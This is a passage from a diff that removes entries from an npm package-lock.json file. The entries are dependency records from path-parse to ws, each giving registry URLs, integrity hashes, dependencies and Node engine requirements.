"sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/picomatch": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.0.tgz", - "integrity": "sha512-lY1Q/PiJGC2zOv/z391WOTD+Z02bCgsFfvxoXXf6h7kv9o+WmsmzYqrAwY63sNgOxE4xEdq0WyUnXfKeBrSvYw==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.20.0", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.20.0.tgz", - "integrity": "sha512-wENBPt4ySzg4ybFQW2TT1zMQucPK95HSh/nq2CFTZVOGut2+pQvSsgtda4d26YrYcr067wjbmzOG8byDPBX63A==", - "dev": true, - "dependencies": { - "is-core-module": "^2.2.0", - "path-parse": "^1.0.6" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmp": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.1.tgz", - "integrity": "sha512-76SUhtfqR2Ijn+xllcI5P1oyannHNHByD80W1q447gU3mp9G9PSpGdWmjUOHRDPiHYacIk66W7ubDTuPF3BEtQ==", - "dependencies": { - "rimraf": "^3.0.0" - }, - "engines": { - "node": ">=8.17.0" - } - }, - "node_modules/tmp-promise": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/tmp-promise/-/tmp-promise-3.0.2.tgz", - "integrity": "sha512-OyCLAKU1HzBjL6Ev3gxUeraJNlbNingmi8IrHHEsYH8LTmEuhvYfqvhn2F/je+mjf4N58UmZ96OMEy1JanSCpA==", - "dependencies": { - "tmp": "^0.2.0" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.0.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.0.5.tgz", - "integrity": "sha512-PL3UciSgIpQ7f6XjVOmbi96vmDHUqAyqDr8YxzopDqX3kfgYtX1cuNeBjP+L9sFXi6nzsGGA6R3fP3DDDJyrxA==", - "dev": true, - "dependencies": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "7.x", - "yargs-parser": "^21.0.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "4.3.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.3.5.tgz", - "integrity": "sha512-DqQgihaQ9cUrskJo9kIyW/+g0Vxsk8cDtZ52a3NGh0YNTfpUSArXSohyUGnvbPazEPLu398C0UxmKSOrPumUzA==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=4.2.0" - } - }, - "node_modules/underscore": { - "version": "1.13.6", - "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", - "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" - }, - "node_modules/ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - 